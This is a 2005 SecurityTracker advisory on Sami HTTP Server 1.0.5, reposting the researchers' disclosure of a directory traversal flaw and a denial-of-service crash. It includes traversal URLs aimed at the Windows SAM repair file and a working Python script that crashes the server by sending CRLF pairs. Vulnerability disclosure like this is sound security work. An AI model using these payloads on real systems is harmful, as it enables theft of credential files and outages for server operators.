Sami HTTP Server Input Validation Holes Disclose Files to Remote Users and Let Remote Users Crash the Service
|
|
SecurityTracker Alert ID: 1013191
|
|
SecurityTracker URL: http://securitytracker.com/id?1013191
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 15 2005
|
Impact: Denial of service via network, Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Advisory: Global Security Solution IT (GSSIT)
|
Version(s): 1.0.5
|
Description: Ziv Kamir of Global Security Solution IT reported a vulnerability in Sami HTTP Server. A remote user can view files on the target system or cause the web service to crash.
A remote user can send a specially crafted HTTP request containing '../' directory traversal characters to obtain files on the system
that are located outside of the web document directory. Encoded directory traversal characters can also be used.
Some demonstration
exploit URLs are provided:
http://[target]/../../winnt/repair/sam
http://[target]/%2e%2e/%2e%2e/winnt/repair/sam
A remote
user can also send an HTTP request with two Carriage Return (CR) and Line Feed (LF) characters ('\x0d\x0a') to cause the web service
to crash.
The vendor was notified on February 6, 2005 without response.
|
Impact: A remote user can view files on the target system that are located outside of the web document directory.
A remote user can cause the target web service to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.karja.com/samihttp/ (Links to External Site)
|
Cause: Exception handling error, Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: GSS IT <gss_it@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 15 Feb 2005 03:34:13 -0800 (PST)
From: GSS IT <gss_it@yahoo.com>
Subject: Sami HTTP Web Server Ver 1.0.5
|
--0-530889896-1108467253=:50538
Content-Type: multipart/alternative; boundary="0-541059298-1108467253=:50538"
--0-541059298-1108467253=:50538
Content-Type: text/plain; charset=us-ascii
Web : www.gssit.co.il
---------------------------------
Do you Yahoo!?
The all-new My Yahoo! – What will yours do?
--0-541059298-1108467253=:50538
Content-Type: text/html; charset=us-ascii
<DIV>
<DIV>Web : <A href="http://www.gssit.co.il/">www.gssit.co.il</A></DIV>
<DIV> </DIV>
<DIV> </DIV></DIV><p>
<hr size=1>Do you Yahoo!?<br>
The <a href="http://my.yahoo.com">all-new My Yahoo!</a> – What will yours do?
--0-541059298-1108467253=:50538--
--0-530889896-1108467253=:50538
Content-Type: text/plain; name="Sami.txt"
Content-Description: Sami.txt
Content-Disposition: inline; filename="Sami.txt"
15/02/05
====================================
GSSIT - Global Security Solution IT
====================================
-------------------------------------------------------
Application: Sami HTTP Server
Web Site: www.karja.com
Versions: 1.0.5
Platform: Windows
Credits:
########
#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# WEB : www.gssit.co.il #
# #
# #
#########################################
---------------------
1) Introduction
2) Bugs
3) The Code
4) Fix
================
1) Introduction
================
Easy to set up webserver, for when you value simplicity and ease of use.
Some of the features are:
Simple setup, and runs on Windows 95/98/Me/NT/2000/XP
Full access to all the server's features from the main control in the system tray
Configuration with a few simple clicks; no need to edit configuration files or run a lengthy setup
Enable PHP support on Sami HTTP Server with a few clicks.
=======
2) Bugs
=======
1) A remote user can obtain files on the system that are located outside of the web document director
y.
2) The web server can be crashed by sending two Carriage Return (CR) and Line Feed (LF) [ \x0d\x0a ].
===========
3) The Code
===========
1)
http://[Target]/../../winnt/repair/sam
http://[Target]/%2e%2e/%2e%2e/winnt/repair/sam
2)
#####################################################################################################
##
##############################################################
# GSS-IT Research And Security Labs #
##############################################################
# #
# www.gssit.co.il #
# #
##############################################################
# Sami HTTP Web Server Ver 1.0.5 Denial Of Service PoC #
##############################################################
# Use This PoC For Educational Purposes Only #
##############################################################
import sys
import socket
print("##########################################################\n")
print("# Sami HTTP Web Server Ver 1.0.5 Denial Of Service PoC #\n")
print("##########################################################\n\n")
if (len(sys.argv) < 3 ) :
print "Usage: %s <Target> <Port>" %sys.argv[0]
sys.exit(0)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = sys.argv[1]
port = int(sys.argv[2])
try:
server.connect((target,port))
print "Sending CRLF ...\n\n"
server.send("\x0d\x0a\x0d\x0a")
server.close()
print "Done ... Check your web server"
except:
print "Cannot connect to http server on %s" %target
#####################################################################################################
##
======
4) Fix
======
Date of Vendor Notification:
----------------------------
06/02/05
Response:
=========
No Response.
==============================================================================================
*** The Data is for educational purpose only. ***
The information in this bulletin is provided "AS IS" without
warranty of any kind. In no event shall we be liable for any
damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.
==============================================================================================
--0-530889896-1108467253=:50538--
|
|
